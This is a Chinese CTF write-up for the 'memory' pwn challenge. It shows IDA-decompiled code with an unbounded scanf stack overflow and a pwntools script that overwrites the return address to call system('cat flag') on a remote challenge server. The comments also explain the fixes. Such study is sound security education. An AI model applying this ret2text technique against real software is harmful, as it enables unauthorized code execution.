# 1. 查看程序
ida32 查看
main 函数:
/*
 * Decompiled (IDA) entry point of the challenge binary, kept as decompiled.
 * Builds a 10-character string from alphanum_2626 using rand() seeded
 * with the wall-clock time, prints it, and hands it to mem_test().
 */
int __cdecl main(int argc, const char **argv, const char **envp)
{
    unsigned int v3; // eax
    char s2[11]; // [esp+1Dh] [ebp-13h] BYREF
    int v6; // [esp+28h] [ebp-8h]
    int i; // [esp+2Ch] [ebp-4h]

    v6 = 10; // number of characters generated below
    puts("\n\n\n------Test Your Memory!-------\n");
    v3 = time(0);
    srand(v3); // seeded from the current time, so the sequence is reproducible given that time
    for ( i = 0; i < v6; ++i )
        s2[i] = alphanum_2626[rand() % 0x3Eu]; // 0x3E == 62; presumably the alphabet size (a-z, A-Z, 0-9) — TODO confirm against alphanum_2626
    // s2[10] is never written: no terminator is stored before s2 is read as a C string here.
    printf("%s", s2);
    mem_test(s2);
    return 0;
}
mem_test (s2) 函数:
/*
 * Decompiled (IDA) prompt routine: reads user input into a 19-byte stack
 * buffer and compares its first 4 bytes with s2.
 *
 * s2: the random string produced by main().
 * Returns whatever puts() returned for the chosen message.
 *
 * The scanf call below is the defect the writeup relies on: "%s" carries
 * no width, so input longer than the buffer overwrites the saved frame
 * (stack-based buffer overflow). A width ("%18s") or
 * fgets(s, sizeof s, stdin) would bound the read; a stack canary would
 * detect the overwrite before return.
 */
int __cdecl mem_test(char *s2)
{
    int result; // eax
    char s[19]; // [esp+15h] [ebp-13h] BYREF

    memset(s, 0, 0xBu); // zeroes only the first 11 bytes of the 19-byte buffer
    puts("\nwhat???? : ");
    printf("0x%x \n", hint); // hint is a global not shown on this page
    puts("cff flag go go go ...\n");
    printf("> ");
    __isoc99_scanf("%s", s); // unbounded read into s: no length limit at all
    if ( !strncmp(s, s2, 4u) ) // only the first 4 characters have to match
        result = puts("good job!!\n");
    else
        result = puts("cff flag is failed!!\n");
    return result;
}
发现有个 scanf 函数,这里没有限制读取可以栈溢出
程序有 system 函数,并且也有 cat flag 字符串
通过溢出把返回地址改为 system 并执行 system (cat flag) 即可。这里为了程序能够正常执行 cat flag,system 的返回地址设为 main;比较函数在后面执行,不会影响我们的执行流程
# Exploit script from the writeup (pwntools). Kept as written; only comments added.
from pwn import *
from LibcSearcher import *  # not used in this script
#context.log_level = 'debug'
context(os='linux', arch='i386', log_level='debug')
#p=process('./memory')
#e=ELF('./')
# Remote CTF instance named in the writeup; use the commented-out local process for study.
p=remote('node4.buuoj.cn',27943)
#shellcode = asm(shellcraft.sh())
# Fixed addresses from the writeup's binary (0x0804xxxx, so apparently not PIE):
# the "cat flag" string, system (presumably its PLT entry — TODO confirm), and main.
# With PIE/ASLR these constants would no longer be valid.
flag=0x80487E0
system=0x8048440
main=0x8048677
# 23 bytes of padding: s sits at ebp-0x13 (19 bytes) plus the 4-byte saved ebp,
# per the IDA stack layout shown above — TODO confirm. Then the overwritten
# return address (system), system's own return address (main, so the program
# keeps running), and system's single argument (the "cat flag" string).
# Root cause is the width-less scanf("%s") in mem_test; a bounded read or a
# stack canary would stop this.
payload1=b"a"*23+p32(system)+p32(main)+p32(flag)
p.sendline(payload1)
p.interactive()